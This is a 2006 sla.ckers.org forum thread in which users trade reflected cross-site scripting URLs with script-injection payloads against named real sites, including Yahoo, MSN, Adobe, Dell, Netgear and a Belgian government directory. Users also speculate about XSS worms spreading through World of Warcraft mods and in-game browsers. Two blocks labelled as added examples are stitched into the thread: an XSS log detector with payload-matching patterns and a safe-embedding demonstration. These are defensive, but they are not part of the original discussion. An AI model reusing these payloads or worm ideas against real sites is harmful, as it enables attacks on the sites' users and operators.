Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
So it begins
Posted by: rsnake
Date: August 21, 2006 10:24AM

http://www.alexa.com/site/site_stats/signup?site_url=http%3A%2F%2Fasdf.com%2F%3F%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&range=3m&widget=g&submitted=true&mode=graph&amzn_id=
http://www.altavista.com/web/res_text?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

These have been out there for a while but are still unfixed.

Re: So it begins
Posted by: rsnake
Date: August 21, 2006 12:09PM

Since not a lot of people read Russian, I thought I'd repost some of the stuff that securitylab.ru has been posting as well:

http://boards.live.com/themes/us/en/ccode.aspx?ForumId=0--></script><script>alert(String.fromCharCode(83,101,99,117,114,105,116,121,108,97,98,46,114,117))</script>
http://movies.msn.com/movies/genre.aspx?genre=Comedy&');alert('www.securitylab.ru
http://boards.live.com/Travelboards/board.aspx?BoardID=144&y000=%20--></script><script>alert(1)</script>
http://www.adobe.com/cfusion/search/index.cfm?loc=en_us&term=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E

He's been finding a lot lately, but they've been closing down just as fast (a good thing).

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: WhiteAcid
Date: August 22, 2006 08:16AM

One that would require some SEing: not only do they need to press the link, they also need to press the continue button in the US users section. Still... could be used for something.

[[url=http://music.yahoo.com/ymu/country/?refurl=javascript:alert('xss');//&data=ymu&.src=]music.yahoo.com[/url]]

Edit:
Another one on the same site, just ask them to view this music video:
http://music.yahoo.com/relaunch/?vid=35111115&fp=1&app=video&skin=23&destURL=http://music.yahoo.com/promo-29644410-158-20060814'});alert('xss');//
The url didn't like being inside a [ url ] tag.

Edit:
https://www.screenselect.co.uk/visitor/sign_up_1.html?promotion_code=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E - MSN's dvd rental site.
http://www.screenselect.co.uk/visitor/browse.html?node_id=6539%22asd%3E%3Cscript%3Ealert('xss')%3C/script%3E

We could post XSS flaws on major sites all day long if we really wanted.

Edit:
http://www1.euro.dell.com/content/products/category.aspx/desktops?c=uk&cs=ukdhs1&l=en&s=qwerty');alert('xss');//
Then convince them to press the "Printable version" link at the bottom right. I guess this will work on any page that has the link on it.

http://www.netgear.com/Products/BridgesAccessPointsandExtenders.aspx?for=Business+qwe%22;alert('xss');// or http://www.netgear.com/Products/BridgesAccessPointsandExtenders.aspx?for=Business+qwe%22%0aalert('xss')//

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 5 time(s). Last edit at 08/22/2006 09:50AM by WhiteAcid.

Re: So it begins
Posted by: rsnake
Date: August 24, 2006 10:38PM

Nice finds! Netgear should definitely know better. Eesh! Looks like the Yahoo ones are fixed (not really much of a surprise, they are pretty on top of this stuff), but the others remain intact.

Re: So it begins
Posted by: Girzi
Date: August 26, 2006 11:10AM

2 XSS on a gov.be domain =) 'Cause I'm from Belgium :P

http://directory.gov.be/home/top/category_id/%22%3E%3Cimg%20src=qsd%20onerror=alert(2006)%3E

POST /home/search search_string=%22%3E%3Cscript%3Ealert%28%2FBlwood%2F%29%3C%2Fscript%3E&Submit2=Chercher+dans+directory

Re: So it begins
Posted by: rsnake
Date: August 26, 2006 12:17PM

Well if you want to try to fool someone into thinking you get lots of traffic you can use the one on Alexa: http://www.alexa.com/site/site_stats/signup?site_url=http%3A%2F%2Fasdf.com%2F%3F%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&range=3m&widget=g&submitted=true&mode=graph&amzn_id=

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Girzi
Date: August 26, 2006 01:05PM

Nice one =)
What about this one:
http://www.homme.lycos.fr/hotbabes/categorie/%22%3E%3Cbody%20onload=alert(%22Blwood%22)%3E

Very well known in France ;) webmail, search...

Let's do an XSS challenge :P?



Edited 3 time(s). Last edit at 08/26/2006 01:09PM by Girzi.

Re: So it begins
Posted by: rsnake
Date: August 26, 2006 10:25PM

What kind of challenge? Or rather, is finding XSS really a challenge? :)

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: August 27, 2006 06:46PM

There's an interesting list of vulnerable sites: http://web3.m34s11.vlinux.de/xss_research.htm

Some of it appears to still work even though it was updated last month.

Re: So it begins
Posted by: Girzi
Date: August 28, 2006 02:37AM

haha Nice list :) I was dying of laughter when I saw hackin9.org on the list!!

Re: So it begins
Posted by: kefka
Date: August 29, 2006 05:29PM

http://www.serverspy.net/site/stats/mods.html?g=0%22%3E%3CSCRIPT%3Ealert(%22kefka%20was%20here%22)%3C/SCRIPT%3E
http://www.allakhazam.com/fsearch.html?subject=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&content=&poster=&date1_m=1&date1_d=1&date1_y=1999&date2_m=1&date2_d=1&date2_y=2007&cats=all&dosearch=1
Major gaming websites, one for FPS games, one for MMO games. Search scripts fail to sanitize quotes.
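Added example, not code from the thread or from any site named in it: a log-side detector for the payload shapes posted so far (quote/attribute breakout, script tags, inline event handlers, javascript: redirect targets, and the quote-plus-`;`-or-newline JavaScript string break-outs), run over a constructed access-log excerpt. Hosts, IPs and paths are made up; only the parameter shapes follow the thread.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Indicator patterns modelled on the payload shapes in this thread: a script
# tag, a quote or "-->" that closes the enclosing tag/comment, an inline event
# handler, a javascript: URL in a redirect parameter, and a quote followed by
# ';' or a raw newline and a call (the JavaScript-string break-outs).
PATTERNS = [
    ("script_tag", re.compile(r"</?script\b", re.I)),
    ("tag_breakout", re.compile(r"[\"']\s*>|-->")),
    ("event_handler", re.compile(r"\bon(load|error|click|mouseover)\s*=", re.I)),
    ("js_uri", re.compile(r"^\s*javascript:", re.I)),
    ("string_breakout", re.compile(r"[\"'][^\"'\w]{0,3}[;\n]\s*\w+\s*\(")),
]
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode_fully(text: str, rounds: int = 3) -> str:
    """Percent-decode until stable (at most `rounds` passes) so a double-encoded %2522 is seen in final form."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            return text
        text = decoded
    return text

def inspect_url(url: str):
    """[(where, indicator), ...] for the decoded path and each query parameter (its name when the pair has no value)."""
    parts = urlsplit(url)
    fields = [("path", parts.path)]
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        fields.append((name, value or name))
    return [(where, label) for where, text in fields
            for label, pat in PATTERNS if pat.search(decode_fully(text))]

def scan_log(log_text: str):
    """[(client_ip, where, indicator), ...] for every Combined Log Format request line whose URL trips an indicator."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.search(line)
        if m:
            ip = line.split(" ", 1)[0]
            findings += [(ip, w, l) for w, l in inspect_url(m.group(1))]
    return findings

# Constructed log excerpt; URL shapes follow the thread, hosts/IPs are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Aug/2006:09:50:00 +0000] "GET /search?q=xss+filters HTTP/1.1" 200 512
10.0.0.7 - - [22/Aug/2006:09:51:10 +0000] "GET /ymu/country/?refurl=javascript:alert('xss');//&data=ymu HTTP/1.1" 200 1024
10.0.0.9 - - [22/Aug/2006:09:52:30 +0000] "GET /Products/Bridges.aspx?for=Business+qwe%22%0aalert('xss')// HTTP/1.1" 200 2048
10.0.0.9 - - [22/Aug/2006:09:53:00 +0000] "GET /home/top/category_id/%22%3E%3Cimg%20src=qsd%20onerror=alert(2006)%3E HTTP/1.1" 404 300
"""
```

Running `scan_log(SAMPLE_LOG)` flags the three payload requests and leaves the plain search alone; the detector is only as good as its patterns, so treat a hit as a triage signal, not proof of a successful reflection.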

Re: So it begins
Posted by: rsnake
Date: August 29, 2006 06:21PM

MMORPGs are an interesting avenue for spreading massive XSS worms that I hadn't thought of. Are there any MMORPGs with browser based input? Seems like a bad idea, but I could totally see why they might build a web-browser interface into games.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: id
Date: August 29, 2006 06:34PM

A couple...

Results 1 - 10 of about 2,270,000 for "web based mmorpg".

-id

Re: So it begins
Posted by: kefka
Date: August 29, 2006 06:34PM

Yes, sir, there are. I've thought a lot about it. In World of Warcraft, you're allowed to make custom UI mods. A lot of the game takes place in what they call "raid content", aka 40-man dungeons. 40 players going into a dungeon, basically. Well, damn near all of these guilds that run these dungeons require you to run a few mods that I've been interested in exploiting, but I'm just a beginner. One that comes to mind is CT_Raid. It's a mod for tracking the life, mana, status effects, etc. of all the raid members; it basically joins a chat channel and sends messages telling the rest of the channel how you're doing. I've modded mine to report version # 420.2600 and I've been very interested in the possibility of a CT_Raid worm.

If you're the raid leader or marked as an assistant, you can execute /rajoin (it's a CT_Raid command) and force everyone in the raid with CTRaid to join your CTRaid channel and sync with you. There's also a "battleground" called Alterac Valley that's 40-man, where you get automatically put into a raid with the rest of the people on your team. I could see a worm propagating there through a vulnerability in the mod (so not owning everyone, but 60-75% would be a pretty accurate number).

Like I said, I'm just a beginner, but I would love for a "security expert" to take a look at the mod and either help me learn or just tell me what he thinks. They're all written in XML and Lua by the way; I realize that's very important, so there it is. But I've already seen a lot of threads on http://ui.worldofwar.net (a WoW UI development website) about executing third party programs from a UI mod, but whether you're able to overflow a buffer or something, I do not know. I'm a lot more interested in SQL injection, XSS, remote file inclusion, web application security, etc. at the moment, but I wouldn't mind switching gears.

Re: So it begins
Posted by: kefka
Date: August 29, 2006 06:48PM

Speaking of WoW, here's another major "WoW database"
http://www.goblinworkshop.com/search2.html?s=%5C%22%3CSCRIPT%3Ealert%28%5C%22kefka%20was%20here%5C%22%29%3C%2FSCRIPT%3E%5C%22

Re: So it begins
Posted by: rsnake
Date: August 29, 2006 07:10PM

http://www.go2.com/webbrowser/indexSearch.cfm?isSuggestion=1&tokenString=%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go2search=Category&accountAction=createTemp&StreetAddress=&city=&State=&zipcode=&radius=10&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: kefka
Date: August 29, 2006 07:39PM

http://comsearch.comcast.commerce.atomz.com/?q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&x=0&y=0
http://home.bellsouth.net/s/s.dll?spage=search%2Fresultshome1.htm&_pgoffset=0&startdate=01%2F01%2F2010&man=1&num=10&type=cat&SearchType=web&string=%22%3CSCRIPT%3Ealert%28%22kefka+was+here%22%29%3C%2FSCRIPT%3E%22&imageField.x=0&imageField.y=0&imageField=search



Edited 1 time(s). Last edit at 08/29/2006 07:41PM by kefka.

Re: So it begins
Posted by: WhiteAcid
Date: August 30, 2006 03:22AM

EVE-online is a game I tried out at the start of the year; didn't like it all that much. That's an MMORPG with a built-in browser. It's there so you can read the developers' blog and game news, and here's the kicker: pressing the website link on a clan's profile opens the in-game browser to their site, which can be hosted anywhere.

I didn't try playing with that, and doing so now would require a new subscription which costs money, but it could be fun to do. Most likely their in-game browser simply doesn't support any JavaScript though, so it cannot possibly execute anything.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: rsnake
Date: August 30, 2006 10:47AM

Hrmm... that would be odd if they didn't support JS (that would actually be surprising to me), as it's just easier to include the entire MSIE framework rather than a crippled version. But even still, there are other things you can do without JavaScript, like CSRF. Really, most of what the JavaScript port scanner is is a series of CSRF attacks strung together. It is possible that this could be used as a mechanism to modify firewall settings, for instance. I wonder how full-featured the browsers in these things are.

There are also browsers embedded in chat clients now too... that feels ultra scary to me.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 02, 2006 08:33PM

http://www.traveltree.co.uk/pages/affiliatefr.asp?URL=javascript:alert('XSS');

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: September 05, 2006 02:32AM

http://www.sparkfun.com/commerce/advanced_search_result.php?keywords=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&x=0&y=0

One of the best (read: cheapest) places for hardware components, if you're a hardware hacker... so please be gentle.

-maluc

Re: So it begins
Posted by: maluc
Date: September 05, 2006 03:29AM

http://www.uo.com/cgi-bin/search.pl?words='%3E%3Cscript%3Ealert(1337)%3C/script%3E%3Cb%20

It seems people still play Ultima Online...

-maluc

Re: So it begins
Posted by: rsnake
Date: September 06, 2006 03:20PM

hahah, I love the php.com one! Ouch!

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 06, 2006 04:29PM

id just pointed out to me that php.com is parents helping parents, not the programming language. Oops! Not quite as cool.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: id
Date: September 06, 2006 04:46PM

yes, a very interesting view of what kinds of things you're all into....

-id

Re: So it begins
Posted by: unsticky
Date: September 06, 2006 05:15PM

Yeah... nothing too great there, on my little list. I found them a few days ago using Google when I was trying to find some Location:-based redirect scripts for a project of mine.

Re: So it begins
Posted by: WhiteAcid
Date: September 06, 2006 05:18PM

http://www.marketwatch.com/tools/marketsummary/default.asp?siteid=mktw%22%0aalert(%22asd%22)//
http://www.marketwatch.com/tools/quotes/quotes.asp?symb=qwerty&vc=&siteid=mktw%22%0aalert(%22asd%22)//&dist=dropmenu
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.arto.com/brugere/login/default.asp?visopret=%26fc=0&destination=&returnUrl=&action=submit&brugernavn=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&kodeord=&xss_note=Basic%20XSS%20in%20the%20username%20field (using POST - actually arto.com)

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer
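The Netgear URLs earlier in the thread and the MarketWatch ones above both rely on the same server-side mistake: a query value spliced into a JavaScript string literal, so a `"` closes the literal and either `;` or a raw newline (`%0a`) ends the statement. As an added example (not code from the thread or from any of the sites named), here is a constructed vulnerable embedding beside a hardened one, plus a small JS-lexer check that shows which of the two survives the posted values; the `siteid` variable name and the `<script>` prefix are assumptions.

```python
import json

PREFIX = '<script>var siteid = '
_SIMPLE_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "b": "\b", "f": "\f"}

def embed_unsafe(site_id: str) -> str:
    """Constructed illustration of the pattern the %22;alert(...) and
    %22%0aalert(...) URLs exploit: raw input spliced into a JS string literal."""
    return PREFIX + '"' + site_id + '";</script>'

def js_string_literal(value: str) -> str:
    """Hardened form: JSON-encode (escapes quotes, backslashes, control and
    non-ASCII characters), then hex-escape the characters the HTML parser acts
    on so that '</script>' or '<!--' can never appear inside the emitted block."""
    encoded = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        encoded = encoded.replace(ch, esc)
    return encoded

def embed_safe(site_id: str) -> str:
    return PREFIX + js_string_literal(site_id) + ";</script>"

def parse_literal(script: str):
    """Read the double-quoted literal after PREFIX as a JS lexer would: returns
    (decoded value, text after the closing quote); a raw newline is a syntax error."""
    i, out = len(PREFIX) + 1, []
    while i < len(script):
        c = script[i]
        if c == '"':
            return "".join(out), script[i + 1:]
        if c == "\n":
            return None, script[i:]
        if c == "\\":
            nxt = script[i + 1]
            if nxt == "u":
                out.append(chr(int(script[i + 2:i + 6], 16)))
                i += 6
            else:
                out.append(_SIMPLE_ESCAPES.get(nxt, nxt))
                i += 2
            continue
        out.append(c)
        i += 1
    return None, ""

def block_is_intact(script: str, expected: str) -> bool:
    """True when the HTML parser sees one </script> and the JS lexer reads the literal back unchanged."""
    value, rest = parse_literal(script)
    return (script.lower().count("</script") == 1
            and value == expected and rest == ";</script>")
```

With the posted values, `embed_unsafe` yields a literal that ends at `mktw` or `qwe` with the rest left as live code, while `embed_safe` round-trips every value, including a `</script>` closer, because `<` is emitted as `\u003c` and never reaches the HTML parser.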

Re: So it begins
Posted by: id
Date: September 06, 2006 05:42PM

I will have to grab hhh.net/com/org and make a "hackers helping hackers" site

-id

Re: So it begins
Posted by: WhiteAcid
Date: September 06, 2006 07:26PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://userfriendly.org/cgi-bin/survey.cgi&personalemail=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E (userfriendly.org)
I originally contacted them on July 21st, no reply.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer
